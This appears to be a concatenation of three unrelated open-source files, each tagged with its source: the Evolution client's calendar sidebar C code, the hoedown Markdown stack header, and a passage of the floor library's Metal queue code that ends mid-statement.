/* * Copyright (C) 2014 Red Hat, Inc. (www.redhat.com) * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU Lesser General Public License as published by * the Free Software Foundation. * * This program is distributed in the hope that it will be useful, but * WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY * or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License * for more details. * * You should have received a copy of the GNU Lesser General Public License * along with this program; if not, see <http://www.gnu.org/licenses/>. * * Authors: Milan Crha <[email protected]> */ #include "evolution-config.h" #include <string.h> #include <glib/gi18n.h> #include "e-util/e-util.h" #include "calendar/gui/comp-util.h" #include "e-cal-base-shell-view.h" #include "e-cal-base-shell-sidebar.h" #define E_CAL_BASE_SHELL_SIDEBAR_GET_PRIVATE(obj) \ (G_TYPE_INSTANCE_GET_PRIVATE \ ((obj), E_TYPE_CAL_BASE_SHELL_SIDEBAR, ECalBaseShellSidebarPrivate)) struct _ECalBaseShellSidebarPrivate { ECalendar *date_navigator; /* not referenced, is inside itself */ GtkWidget *paned; /* not referenced, is inside itself */ ESourceSelector *selector; /* not referenced, is inside itself */ gulong date_navigator_scroll_event_handler_id; GHashTable *selected_uids; /* source UID -> cancellable */ }; enum { PROP_0, PROP_DATE_NAVIGATOR, PROP_SELECTOR }; enum { CLIENT_OPENED, CLIENT_CLOSED, LAST_SIGNAL }; static guint signals[LAST_SIGNAL]; G_DEFINE_DYNAMIC_TYPE (ECalBaseShellSidebar, e_cal_base_shell_sidebar, E_TYPE_SHELL_SIDEBAR) static gboolean cal_base_shell_sidebar_map_uid_to_source (GValue *value, GVariant *variant, gpointer user_data) { ESourceRegistry *registry; ESource *source; const gchar *uid; registry = E_SOURCE_REGISTRY (user_data); uid = g_variant_get_string (variant, NULL); if (uid != NULL && *uid != '\0') source = e_source_registry_ref_source (registry, uid); else source = e_source_registry_ref_default_calendar (registry); g_value_take_object (value, source); return (source != NULL); } static GVariant * cal_base_shell_sidebar_map_source_to_uid (const GValue *value, const GVariantType *expected_type, gpointer user_data) { GVariant *variant = NULL; ESource *source; source = g_value_get_object (value); if (source != NULL) { const gchar *uid; uid = e_source_get_uid (source); variant = g_variant_new_string (uid); } return variant; } static void cal_base_shell_sidebar_restore_state_cb (EShellWindow *shell_window, EShellView *shell_view, EShellSidebar *shell_sidebar) { ECalBaseShellSidebarPrivate *priv; ESourceRegistry *registry; ESourceSelector *selector; GSettings *settings; const gchar *primary_source_key = NULL; priv = E_CAL_BASE_SHELL_SIDEBAR (shell_sidebar)->priv; g_signal_handlers_disconnect_by_func ( shell_window, cal_base_shell_sidebar_restore_state_cb, shell_sidebar); switch (e_cal_base_shell_view_get_source_type (shell_view)) { case E_CAL_CLIENT_SOURCE_TYPE_EVENTS: primary_source_key = "primary-calendar"; break; case E_CAL_CLIENT_SOURCE_TYPE_MEMOS: primary_source_key = "primary-memos"; break; case E_CAL_CLIENT_SOURCE_TYPE_TASKS: primary_source_key = "primary-tasks"; break; case E_CAL_CLIENT_SOURCE_TYPE_LAST: g_warn_if_reached (); return; } selector = E_SOURCE_SELECTOR (priv->selector); registry = e_source_selector_get_registry (selector); /* Bind GObject properties to settings keys. */ settings = e_util_ref_settings ("org.gnome.evolution.calendar"); g_settings_bind_with_mapping ( settings, primary_source_key, selector, "primary-selection", G_SETTINGS_BIND_DEFAULT, cal_base_shell_sidebar_map_uid_to_source, cal_base_shell_sidebar_map_source_to_uid, g_object_ref (registry), (GDestroyNotify) g_object_unref); if (priv->date_navigator) { if (e_shell_window_is_main_instance (shell_window)) { g_settings_bind ( settings, "date-navigator-pane-position", priv->paned, "vposition", G_SETTINGS_BIND_DEFAULT); } else { g_settings_bind ( settings, "date-navigator-pane-position-sub", priv->paned, "vposition", G_SETTINGS_BIND_DEFAULT | G_SETTINGS_BIND_GET_NO_CHANGES); } } g_object_unref (settings); } static guint32 cal_base_shell_sidebar_check_state (EShellSidebar *shell_sidebar) { ECalBaseShellSidebar *cal_base_shell_sidebar; ESourceSelector *selector; ESourceRegistry *registry; ESource *source, *clicked_source; gboolean is_writable = FALSE; gboolean is_removable = FALSE; gboolean is_remote_creatable = FALSE; gboolean is_remote_deletable = FALSE; gboolean in_collection = FALSE; gboolean refresh_supported = FALSE; gboolean has_primary_source = FALSE; guint32 state = 0; cal_base_shell_sidebar = E_CAL_BASE_SHELL_SIDEBAR (shell_sidebar); selector = e_cal_base_shell_sidebar_get_selector (cal_base_shell_sidebar); source = e_source_selector_ref_primary_selection (selector); registry = e_source_selector_get_registry (selector); if (source != NULL) { EClient *client; ESource *collection; has_primary_source = TRUE; is_writable = e_source_get_writable (source); is_removable = e_source_get_removable (source); is_remote_creatable = e_source_get_remote_creatable (source); is_remote_deletable = e_source_get_remote_deletable (source); collection = e_source_registry_find_extension ( registry, source, E_SOURCE_EXTENSION_COLLECTION); if (collection != NULL) { in_collection = TRUE; g_object_unref (collection); } client = e_client_selector_ref_cached_client ( E_CLIENT_SELECTOR (selector), source); if (client != NULL) { refresh_supported = e_client_check_refresh_supported (client); g_object_unref (client); } g_object_unref (source); } clicked_source = e_cal_base_shell_view_get_clicked_source (e_shell_sidebar_get_shell_view (shell_sidebar)); if (clicked_source && clicked_source == source) state |= E_CAL_BASE_SHELL_SIDEBAR_CLICKED_SOURCE_IS_PRIMARY; if (clicked_source && e_source_has_extension (clicked_source, E_SOURCE_EXTENSION_COLLECTION)) state |= E_CAL_BASE_SHELL_SIDEBAR_CLICKED_SOURCE_IS_COLLECTION; if (e_source_selector_count_total (selector) == e_source_selector_count_selected (selector)) state |= E_CAL_BASE_SHELL_SIDEBAR_ALL_SOURCES_SELECTED; if (has_primary_source) state |= E_CAL_BASE_SHELL_SIDEBAR_HAS_PRIMARY_SOURCE; if (is_writable) state |= E_CAL_BASE_SHELL_SIDEBAR_PRIMARY_SOURCE_IS_WRITABLE; if (is_removable) state |= E_CAL_BASE_SHELL_SIDEBAR_PRIMARY_SOURCE_IS_REMOVABLE; if (is_remote_creatable) state |= E_CAL_BASE_SHELL_SIDEBAR_PRIMARY_SOURCE_IS_REMOTE_CREATABLE; if (is_remote_deletable) state |= E_CAL_BASE_SHELL_SIDEBAR_PRIMARY_SOURCE_IS_REMOTE_DELETABLE; if (in_collection) state |= E_CAL_BASE_SHELL_SIDEBAR_PRIMARY_SOURCE_IN_COLLECTION; if (refresh_supported) state |= E_CAL_BASE_SHELL_SIDEBAR_SOURCE_SUPPORTS_REFRESH; return state; } static gboolean cal_base_shell_sidebar_date_navigator_scroll_event_cb (ECalBaseShellSidebar *cal_base_shell_sidebar, GdkEventScroll *event, ECalendar *date_navigator) { ECalendarItem *calitem; gint year = -1, month = -1; GdkScrollDirection direction; calitem = e_calendar_get_item (date_navigator); e_calendar_item_get_first_month (calitem, &year, &month); if (year == -1 || month == -1) return FALSE; direction = event->direction; if (direction == GDK_SCROLL_SMOOTH) { static gdouble total_delta_y = 0.0; total_delta_y += event->delta_y; if (total_delta_y >= 1.0) { total_delta_y = 0.0; direction = GDK_SCROLL_DOWN; } else if (total_delta_y <= -1.0) { total_delta_y = 0.0; direction = GDK_SCROLL_UP; } else { return FALSE; } } switch (direction) { case GDK_SCROLL_UP: month--; if (month < 0) { year--; month += 12; } break; case GDK_SCROLL_DOWN: month++; if (month >= 12) { year++; month -= 12; } break; default: g_return_val_if_reached (FALSE); } e_calendar_item_set_first_month (calitem, year, month); return TRUE; } typedef struct _OpenClientData { const gchar *extension_name; ECalBaseShellSidebar *sidebar; ESource *source; EClient *client; gboolean was_cancelled; } OpenClientData; static void open_client_data_free (gpointer pdata) { OpenClientData *data = pdata; if (data) { /* To free the cancellable in the 'value' pair, which is useless now */ g_hash_table_insert (data->sidebar->priv->selected_uids, g_strdup (e_source_get_uid (data->source)), NULL); if (data->client) { g_signal_emit (data->sidebar, signals[CLIENT_OPENED], 0, data->client); } else if (!data->was_cancelled) { ESourceSelector *selector = e_cal_base_shell_sidebar_get_selector (data->sidebar); e_source_selector_unselect_source (selector, data->source); } g_clear_object (&data->sidebar); g_clear_object (&data->source); g_clear_object (&data->client); g_slice_free (OpenClientData, data); } } static void e_cal_base_shell_sidebar_open_client_thread (EAlertSinkThreadJobData *job_data, gpointer user_data, GCancellable *cancellable, GError **error) { EClientSelector *selector; OpenClientData *data = user_data; GError *local_error = NULL; g_return_if_fail (data != NULL); selector = E_CLIENT_SELECTOR (e_cal_base_shell_sidebar_get_selector (data->sidebar)); data->client = e_client_selector_get_client_sync ( selector, data->source, TRUE, (guint32) -1, cancellable, &local_error); data->was_cancelled = g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_CANCELLED); e_util_propagate_open_source_job_error (job_data, data->extension_name, local_error, error); } static void e_cal_base_shell_sidebar_ensure_source_opened (ECalBaseShellSidebar *sidebar, ESource *source) { OpenClientData *data; EShellView *shell_view; EActivity *activity; gchar *description = NULL, *alert_ident = NULL, *alert_arg_0 = NULL, *display_name; const gchar *extension_name = NULL; g_return_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (sidebar)); g_return_if_fail (E_IS_SOURCE (source)); /* Skip it when it's already opening or opened */ if (g_hash_table_contains (sidebar->priv->selected_uids, e_source_get_uid (source))) return; shell_view = e_shell_sidebar_get_shell_view (E_SHELL_SIDEBAR (sidebar)); switch (e_cal_base_shell_view_get_source_type (shell_view)) { case E_CAL_CLIENT_SOURCE_TYPE_EVENTS: extension_name = E_SOURCE_EXTENSION_CALENDAR; break; case E_CAL_CLIENT_SOURCE_TYPE_MEMOS: extension_name = E_SOURCE_EXTENSION_MEMO_LIST; break; case E_CAL_CLIENT_SOURCE_TYPE_TASKS: extension_name = E_SOURCE_EXTENSION_TASK_LIST; break; case E_CAL_CLIENT_SOURCE_TYPE_LAST: g_warn_if_reached (); return; } display_name = e_util_get_source_full_name (e_shell_get_registry (e_shell_backend_get_shell (e_shell_view_get_shell_backend (shell_view))), source); if (!e_util_get_open_source_job_info (extension_name, display_name, &description, &alert_ident, &alert_arg_0)) { g_free (display_name); g_warn_if_reached (); return; } g_free (display_name); data = g_slice_new0 (OpenClientData); data->extension_name = extension_name; /* no need to copy, it's a static string */ data->sidebar = g_object_ref (sidebar); data->source = g_object_ref (source); activity = e_shell_view_submit_thread_job ( shell_view, description, alert_ident, alert_arg_0, e_cal_base_shell_sidebar_open_client_thread, data, open_client_data_free); if (activity) { GCancellable *cancellable; cancellable = e_activity_get_cancellable (activity); g_hash_table_insert (sidebar->priv->selected_uids, g_strdup (e_source_get_uid (source)), g_object_ref (cancellable)); g_object_unref (activity); } g_free (description); g_free (alert_ident); g_free (alert_arg_0); } static void e_cal_base_shell_sidebar_primary_selection_changed_cb (ESourceSelector *selector, EShellSidebar *sidebar) { g_return_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (sidebar)); e_shell_view_update_actions (e_shell_sidebar_get_shell_view (sidebar)); } static void e_cal_base_shell_sidebar_source_selected (ESourceSelector *selector, ESource *source, ECalBaseShellSidebar *sidebar) { g_return_if_fail (E_IS_SOURCE_SELECTOR (selector)); g_return_if_fail (E_IS_SOURCE (source)); g_return_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (sidebar)); if (!g_hash_table_contains (sidebar->priv->selected_uids, e_source_get_uid (source))) { e_cal_base_shell_sidebar_ensure_source_opened (sidebar, source); } } static void e_cal_base_shell_sidebar_source_unselected (ESourceSelector *selector, ESource *source, ECalBaseShellSidebar *sidebar) { g_return_if_fail (E_IS_SOURCE_SELECTOR (selector)); g_return_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (sidebar)); if (g_hash_table_remove (sidebar->priv->selected_uids, e_source_get_uid (source))) g_signal_emit (sidebar, signals[CLIENT_CLOSED], 0, source); } typedef struct { ESource *source; ESource *destination; gboolean do_copy; ICalComponent *icomp; EClientSelector *selector; } TransferItemToData; static void transfer_item_to_data_free (gpointer ptr) { TransferItemToData *titd = ptr; if (titd) { g_clear_object (&titd->source); g_clear_object (&titd->destination); g_clear_object (&titd->selector); g_clear_object (&titd->icomp); g_slice_free (TransferItemToData, titd); } } static void cal_base_shell_sidebar_transfer_thread (EAlertSinkThreadJobData *job_data, gpointer user_data, GCancellable *cancellable, GError **error) { TransferItemToData *titd = user_data; EClient *source_client, *destination_client; g_return_if_fail (titd != NULL); g_return_if_fail (E_IS_SOURCE (titd->source)); g_return_if_fail (E_IS_SOURCE (titd->destination)); g_return_if_fail (E_IS_CLIENT_SELECTOR (titd->selector)); g_return_if_fail (titd->icomp != NULL); source_client = e_client_selector_get_client_sync ( titd->selector, titd->source, FALSE, 30, cancellable, error); if (!source_client) return; destination_client = e_client_selector_get_client_sync ( titd->selector, titd->destination, FALSE, 30, cancellable, error); if (!destination_client) { g_object_unref (source_client); return; } cal_comp_transfer_item_to_sync (E_CAL_CLIENT (source_client), E_CAL_CLIENT (destination_client), titd->icomp, titd->do_copy, cancellable, error); g_clear_object (&source_client); g_clear_object (&destination_client); } static gboolean e_cal_base_shell_sidebar_selector_data_dropped (ESourceSelector *selector, GtkSelectionData *selection_data, ESource *destination, GdkDragAction action, guint info, ECalBaseShellSidebar *sidebar) { ICalComponent *icomp = NULL; EActivity *activity; EShellView *shell_view; ESource *source = NULL; ESourceRegistry *registry; gchar **segments; gchar *source_uid = NULL; gchar *message = NULL; gchar *display_name = NULL; const gchar *alert_ident = NULL; const guchar *data; gboolean do_copy; TransferItemToData *titd; g_return_val_if_fail (E_IS_SOURCE_SELECTOR (selector), FALSE); g_return_val_if_fail (E_IS_SOURCE (destination), FALSE); g_return_val_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (sidebar), FALSE); data = gtk_selection_data_get_data (selection_data); g_return_val_if_fail (data != NULL, FALSE); segments = g_strsplit ((const gchar *) data, "\n", 2); if (g_strv_length (segments) != 2) goto exit; source_uid = g_strdup (segments[0]); icomp = i_cal_parser_parse_string (segments[1]); if (!icomp) goto exit; registry = e_source_selector_get_registry (selector); source = e_source_registry_ref_source (registry, source_uid); if (!source) goto exit; display_name = e_util_get_source_full_name (registry, destination); do_copy = action == GDK_ACTION_COPY ? TRUE : FALSE; shell_view = e_shell_sidebar_get_shell_view (E_SHELL_SIDEBAR (sidebar)); switch (e_cal_base_shell_view_get_source_type (shell_view)) { case E_CAL_CLIENT_SOURCE_TYPE_EVENTS: message = do_copy ? g_strdup_printf (_("Copying an event into the calendar “%s”"), display_name) : g_strdup_printf (_("Moving an event into the calendar “%s”"), display_name); alert_ident = do_copy ? "calendar:failed-copy-event" : "calendar:failed-move-event"; break; case E_CAL_CLIENT_SOURCE_TYPE_MEMOS: message = do_copy ? g_strdup_printf (_("Copying a memo into the memo list “%s”"), display_name) : g_strdup_printf (_("Moving a memo into the memo list “%s”"), display_name); alert_ident = do_copy ? "calendar:failed-copy-memo" : "calendar:failed-move-memo"; break; case E_CAL_CLIENT_SOURCE_TYPE_TASKS: message = do_copy ? g_strdup_printf (_("Copying a task into the task list “%s”"), display_name) : g_strdup_printf (_("Moving a task into the task list “%s”"), display_name); alert_ident = do_copy ? "calendar:failed-copy-task" : "calendar:failed-move-task"; break; case E_CAL_CLIENT_SOURCE_TYPE_LAST: g_warn_if_reached (); goto exit; } titd = g_slice_new0 (TransferItemToData); titd->source = g_object_ref (source); titd->destination = g_object_ref (destination); titd->do_copy = do_copy; titd->icomp = icomp; titd->selector = g_object_ref (selector); icomp = NULL; activity = e_shell_view_submit_thread_job (shell_view, message, alert_ident, display_name, cal_base_shell_sidebar_transfer_thread, titd, transfer_item_to_data_free); g_clear_object (&activity); exit: g_clear_object (&icomp); g_clear_object (&source); g_free (message); g_free (source_uid); g_free (display_name); g_strfreev (segments); return TRUE; } static void cancel_and_unref (gpointer data) { GCancellable *cancellable = data; if (cancellable) { g_cancellable_cancel (cancellable); g_object_unref (cancellable); } } static void cal_base_shell_sidebar_get_property (GObject *object, guint property_id, GValue *value, GParamSpec *pspec) { switch (property_id) { case PROP_DATE_NAVIGATOR: g_value_set_object ( value, e_cal_base_shell_sidebar_get_date_navigator ( E_CAL_BASE_SHELL_SIDEBAR (object))); return; case PROP_SELECTOR: g_value_set_object ( value, e_cal_base_shell_sidebar_get_selector ( E_CAL_BASE_SHELL_SIDEBAR (object))); return; } G_OBJECT_WARN_INVALID_PROPERTY_ID (object, property_id, pspec); } static void e_cal_base_shell_sidebar_update_calendar_margin_cb (GObject *object, GParamSpec *pspec, gpointer *user_data) { EShellWindow *shell_window; GtkWidget *calendar; gboolean switcher_visible; shell_window = E_SHELL_WINDOW (object); calendar = GTK_WIDGET (user_data); switcher_visible = e_shell_window_get_switcher_visible (shell_window); if (switcher_visible) gtk_widget_set_margin_bottom (calendar, 0); else gtk_widget_set_margin_bottom (calendar, 6); } static void cal_base_shell_sidebar_constructed (GObject *object) { EShellWindow *shell_window; EShellView *shell_view; EShellBackend *shell_backend; EShell *shell; EClientCache *client_cache; const gchar *source_extension = NULL, *selector_name = NULL, *restore_state_signal = NULL; ECalBaseShellSidebar *cal_base_shell_sidebar; GtkWidget *container, *widget; AtkObject *a11y; gboolean add_navigator = FALSE; /* Chain up to parent's constructed() method. */ G_OBJECT_CLASS (e_cal_base_shell_sidebar_parent_class)->constructed (object); cal_base_shell_sidebar = E_CAL_BASE_SHELL_SIDEBAR (object); shell_view = e_shell_sidebar_get_shell_view (E_SHELL_SIDEBAR (object)); shell_backend = e_shell_view_get_shell_backend (shell_view); shell_window = e_shell_view_get_shell_window (shell_view); shell = e_shell_backend_get_shell (shell_backend); switch (e_cal_base_shell_view_get_source_type (shell_view)) { case E_CAL_CLIENT_SOURCE_TYPE_EVENTS: source_extension = E_SOURCE_EXTENSION_CALENDAR; selector_name = _("Calendar Selector"); restore_state_signal = "shell-view-created::calendar"; add_navigator = TRUE; break; case E_CAL_CLIENT_SOURCE_TYPE_MEMOS: source_extension = E_SOURCE_EXTENSION_MEMO_LIST; selector_name = _("Memo List Selector"); restore_state_signal = "shell-view-created::memos"; break; case E_CAL_CLIENT_SOURCE_TYPE_TASKS: source_extension = E_SOURCE_EXTENSION_TASK_LIST; selector_name = _("Task List Selector"); restore_state_signal = "shell-view-created::tasks"; break; case E_CAL_CLIENT_SOURCE_TYPE_LAST: g_warn_if_reached (); return; } client_cache = e_shell_get_client_cache (shell); container = GTK_WIDGET (object); widget = e_paned_new (GTK_ORIENTATION_VERTICAL); gtk_container_add (GTK_CONTAINER (container), widget); cal_base_shell_sidebar->priv->paned = widget; container = widget; widget = gtk_box_new (GTK_ORIENTATION_VERTICAL, 6); gtk_paned_pack1 (GTK_PANED (container), widget, TRUE, TRUE); container = widget; widget = gtk_scrolled_window_new (NULL, NULL); gtk_scrolled_window_set_policy ( GTK_SCROLLED_WINDOW (widget), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_box_pack_start (GTK_BOX (container), widget, TRUE, TRUE, 0); container = widget; widget = e_client_selector_new (client_cache, source_extension); a11y = gtk_widget_get_accessible (widget); atk_object_set_name (a11y, selector_name); cal_base_shell_sidebar->priv->selector = E_SOURCE_SELECTOR (widget); gtk_container_add (GTK_CONTAINER (container), widget); e_source_selector_load_groups_setup (cal_base_shell_sidebar->priv->selector, e_shell_view_get_state_key_file (shell_view)); if (add_navigator) { ECalendarItem *calitem; container = cal_base_shell_sidebar->priv->paned; widget = e_calendar_new (); gtk_widget_set_margin_top (widget, 6); gtk_widget_set_margin_start (widget, 6); gtk_widget_set_margin_end (widget, 6); calitem = e_calendar_get_item (E_CALENDAR (widget)); e_calendar_item_set_days_start_week_sel (calitem, 9); e_calendar_item_set_max_days_sel (calitem, 42); gtk_paned_pack2 (GTK_PANED (container), widget, FALSE, FALSE); cal_base_shell_sidebar->priv->date_navigator = E_CALENDAR (widget); gtk_widget_show (widget); gnome_canvas_item_set ( GNOME_CANVAS_ITEM (e_calendar_get_item (cal_base_shell_sidebar->priv->date_navigator)), "move-selection-when-moving", FALSE, NULL); cal_base_shell_sidebar->priv->date_navigator_scroll_event_handler_id = g_signal_connect_swapped ( cal_base_shell_sidebar->priv->date_navigator, "scroll-event", G_CALLBACK (cal_base_shell_sidebar_date_navigator_scroll_event_cb), cal_base_shell_sidebar); } gtk_widget_show_all (GTK_WIDGET (object)); gtk_drag_dest_set ( GTK_WIDGET (cal_base_shell_sidebar->priv->selector), GTK_DEST_DEFAULT_ALL, NULL, 0, GDK_ACTION_COPY | GDK_ACTION_MOVE); e_drag_dest_add_calendar_targets (GTK_WIDGET (cal_base_shell_sidebar->priv->selector)); g_signal_connect (shell_window, "notify::switcher-visible", G_CALLBACK (e_cal_base_shell_sidebar_update_calendar_margin_cb), widget); g_signal_connect (cal_base_shell_sidebar->priv->selector, "data-dropped", G_CALLBACK (e_cal_base_shell_sidebar_selector_data_dropped), cal_base_shell_sidebar); g_signal_connect (cal_base_shell_sidebar->priv->selector, "primary-selection-changed", G_CALLBACK (e_cal_base_shell_sidebar_primary_selection_changed_cb), cal_base_shell_sidebar); g_signal_connect (cal_base_shell_sidebar->priv->selector, "source-selected", G_CALLBACK (e_cal_base_shell_sidebar_source_selected), cal_base_shell_sidebar); g_signal_connect (cal_base_shell_sidebar->priv->selector, "source-unselected", G_CALLBACK (e_cal_base_shell_sidebar_source_unselected), cal_base_shell_sidebar); /* Restore widget state from the last session once * the shell view is fully initialized and visible. */ g_signal_connect ( shell_window, restore_state_signal, G_CALLBACK (cal_base_shell_sidebar_restore_state_cb), cal_base_shell_sidebar); } static void cal_base_shell_sidebar_dispose (GObject *object) { ECalBaseShellSidebar *cal_base_shell_sidebar; cal_base_shell_sidebar = E_CAL_BASE_SHELL_SIDEBAR (object); if (cal_base_shell_sidebar->priv->date_navigator_scroll_event_handler_id > 0 && cal_base_shell_sidebar->priv->date_navigator) { g_signal_handler_disconnect (cal_base_shell_sidebar->priv->date_navigator, cal_base_shell_sidebar->priv->date_navigator_scroll_event_handler_id); cal_base_shell_sidebar->priv->date_navigator_scroll_event_handler_id = 0; } cal_base_shell_sidebar->priv->date_navigator = NULL; cal_base_shell_sidebar->priv->selector = NULL; cal_base_shell_sidebar->priv->paned = NULL; /* Chain up to parent's method. */ G_OBJECT_CLASS (e_cal_base_shell_sidebar_parent_class)->dispose (object); } static void cal_base_shell_sidebar_finalize (GObject *object) { ECalBaseShellSidebar *cal_base_shell_sidebar; cal_base_shell_sidebar = E_CAL_BASE_SHELL_SIDEBAR (object); g_hash_table_destroy (cal_base_shell_sidebar->priv->selected_uids); cal_base_shell_sidebar->priv->selected_uids = NULL; /* Chain up to parent's method. */ G_OBJECT_CLASS (e_cal_base_shell_sidebar_parent_class)->finalize (object); } static void e_cal_base_shell_sidebar_class_init (ECalBaseShellSidebarClass *class) { GObjectClass *object_class; EShellSidebarClass *shell_sidebar_class; g_type_class_add_private (class, sizeof (ECalBaseShellSidebarPrivate)); object_class = G_OBJECT_CLASS (class); object_class->get_property = cal_base_shell_sidebar_get_property; object_class->constructed = cal_base_shell_sidebar_constructed; object_class->dispose = cal_base_shell_sidebar_dispose; object_class->finalize = cal_base_shell_sidebar_finalize; shell_sidebar_class = E_SHELL_SIDEBAR_CLASS (class); shell_sidebar_class->check_state = cal_base_shell_sidebar_check_state; g_object_class_install_property ( object_class, PROP_SELECTOR, g_param_spec_object ( "selector", "Source Selector Widget", "This widget displays groups of calendars", E_TYPE_SOURCE_SELECTOR, G_PARAM_READABLE)); g_object_class_install_property ( object_class, PROP_DATE_NAVIGATOR, g_param_spec_object ( "date-navigator", "Date Navigator Widget", "This widget displays a miniature calendar", E_TYPE_CALENDAR, G_PARAM_READABLE)); signals[CLIENT_OPENED] = g_signal_new ( "client-opened", G_OBJECT_CLASS_TYPE (object_class), G_SIGNAL_RUN_LAST, G_STRUCT_OFFSET (ECalBaseShellSidebarClass, client_opened), NULL, NULL, g_cclosure_marshal_VOID__OBJECT, G_TYPE_NONE, 1, E_TYPE_CAL_CLIENT); signals[CLIENT_CLOSED] = g_signal_new ( "client-closed", G_OBJECT_CLASS_TYPE (object_class), G_SIGNAL_RUN_LAST, G_STRUCT_OFFSET (ECalBaseShellSidebarClass, client_closed), NULL, NULL, g_cclosure_marshal_VOID__OBJECT, G_TYPE_NONE, 1, E_TYPE_SOURCE); } static void e_cal_base_shell_sidebar_class_finalize (ECalBaseShellSidebarClass *class) { } static void e_cal_base_shell_sidebar_init (ECalBaseShellSidebar *cal_base_shell_sidebar) { cal_base_shell_sidebar->priv = E_CAL_BASE_SHELL_SIDEBAR_GET_PRIVATE (cal_base_shell_sidebar); cal_base_shell_sidebar->priv->selected_uids = g_hash_table_new_full (g_str_hash, g_str_equal, g_free, cancel_and_unref); } void e_cal_base_shell_sidebar_type_register (GTypeModule *type_module) { /* XXX G_DEFINE_DYNAMIC_TYPE declares a static type registration * function, so we have to wrap it with a public function in * order to register types from a separate compilation unit. */ e_cal_base_shell_sidebar_register_type (type_module); } GtkWidget * e_cal_base_shell_sidebar_new (EShellView *shell_view) { g_return_val_if_fail (E_IS_SHELL_VIEW (shell_view), NULL); return g_object_new ( E_TYPE_CAL_BASE_SHELL_SIDEBAR, "shell-view", shell_view, NULL); } ECalendar * e_cal_base_shell_sidebar_get_date_navigator (ECalBaseShellSidebar *cal_base_shell_sidebar) { g_return_val_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (cal_base_shell_sidebar), NULL); return cal_base_shell_sidebar->priv->date_navigator; } ESourceSelector * e_cal_base_shell_sidebar_get_selector (ECalBaseShellSidebar *cal_base_shell_sidebar) { g_return_val_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (cal_base_shell_sidebar), NULL); return cal_base_shell_sidebar->priv->selector; } void e_cal_base_shell_sidebar_ensure_sources_open (ECalBaseShellSidebar *cal_base_shell_sidebar) { GList *selected, *link; ESourceSelector *selector; g_return_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (cal_base_shell_sidebar)); selector = cal_base_shell_sidebar->priv->selector; g_return_if_fail (E_IS_SOURCE_SELECTOR (selector)); selected = e_source_selector_get_selection (selector); for (link = selected; link; link = g_list_next (link)) { ESource *source = link->data; e_cal_base_shell_sidebar_ensure_source_opened (cal_base_shell_sidebar, source); } g_list_free_full (selected, g_object_unref); }
{ "pile_set_name": "Github" }
/* stack.h - simple stacking */ #ifndef HOEDOWN_STACK_H #define HOEDOWN_STACK_H #include <stddef.h> #ifdef __cplusplus extern "C" { #endif /********* * TYPES * *********/ struct hoedown_stack { void **item; size_t size; size_t asize; }; typedef struct hoedown_stack hoedown_stack; /************* * FUNCTIONS * *************/ /* hoedown_stack_init: initialize a stack */ void hoedown_stack_init(hoedown_stack *st, size_t initial_size); /* hoedown_stack_uninit: free internal data of the stack */ void hoedown_stack_uninit(hoedown_stack *st); /* hoedown_stack_grow: increase the allocated size to the given value */ void hoedown_stack_grow(hoedown_stack *st, size_t neosz); /* hoedown_stack_push: push an item to the top of the stack */ void hoedown_stack_push(hoedown_stack *st, void *item); /* hoedown_stack_pop: retrieve and remove the item at the top of the stack */ void *hoedown_stack_pop(hoedown_stack *st); /* hoedown_stack_top: retrieve the item at the top of the stack */ void *hoedown_stack_top(const hoedown_stack *st); #ifdef __cplusplus } #endif #endif /** HOEDOWN_STACK_H **/
{ "pile_set_name": "Github" }
/* * Flo's Open libRary (floor) * Copyright (C) 2004 - 2020 Florian Ziesche * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; version 2 of the License only. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License along * with this program; if not, write to the Free Software Foundation, Inc., * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. */ #include <floor/compute/metal/metal_queue.hpp> #if !defined(FLOOR_NO_METAL) #include <floor/darwin/darwin_helper.hpp> // make GPUStartTime/GPUEndTime available everywhere @protocol MTLCommandBufferProfiling <MTLCommandBuffer> @property(readonly) double GPUEndTime; @property(readonly) double GPUStartTime; @end metal_queue::metal_queue(const compute_device& device_, id <MTLCommandQueue> queue_) : compute_queue(device_), queue(queue_) { // check if we can do profiling id <MTLCommandBuffer> buffer = [queue commandBufferWithUnretainedReferences]; __unsafe_unretained id <MTLCommandBufferProfiling> prof_buffer = (id <MTLCommandBufferProfiling>)buffer; if ([prof_buffer respondsToSelector:@selector(GPUStartTime)] && [prof_buffer respondsToSelector:@selector(GPUEndTime)]) { can_do_profiling = true; } buffer = nil; } void metal_queue::finish() const { // need to copy current set of command buffers, so we don't deadlock when removing completed command buffers decltype(cmd_buffers) cur_cmd_buffers; { GUARD(cmd_buffers_lock); cur_cmd_buffers = cmd_buffers; } for(const auto& cmd_buffer : cur_cmd_buffers) { [cmd_buffer.first waitUntilCompleted]; } } void metal_queue::flush() const { // need to copy current set of command buffers, so we don't deadlock when removing completed command buffers decltype(cmd_buffers) cur_cmd_buffers; { GUARD(cmd_buffers_lock); cur_cmd_buffers = cmd_buffers; } for(const auto& cmd_buffer : cur_cmd_buffers) { [cmd_buffer.first waitUntilScheduled]; } } const void* metal_queue::get_queue_ptr() const { return (__bridge const void*)queue; } void* metal_queue::get_queue_ptr() { return (__bridge void*)queue; } id <MTLCommandQueue> metal_queue::get_queue() const { return queue; } id <MTLCommandBuffer> metal_queue::make_command_buffer() const { id <MTLCommandBuffer> cmd_buffer = [queue commandBufferWithUnretainedReferences]; [cmd_buffer addCompletedHandler:^(id <MTLCommandBuffer> buffer) { GUARD(cmd_buffers_lock); const auto iter = find_if(cbegin(cmd_buffers), cend(cmd_buffers), [&buffer](const decltype(cmd_buffers)::value_type& elem) { return (elem.first == buffer); }); if(iter == 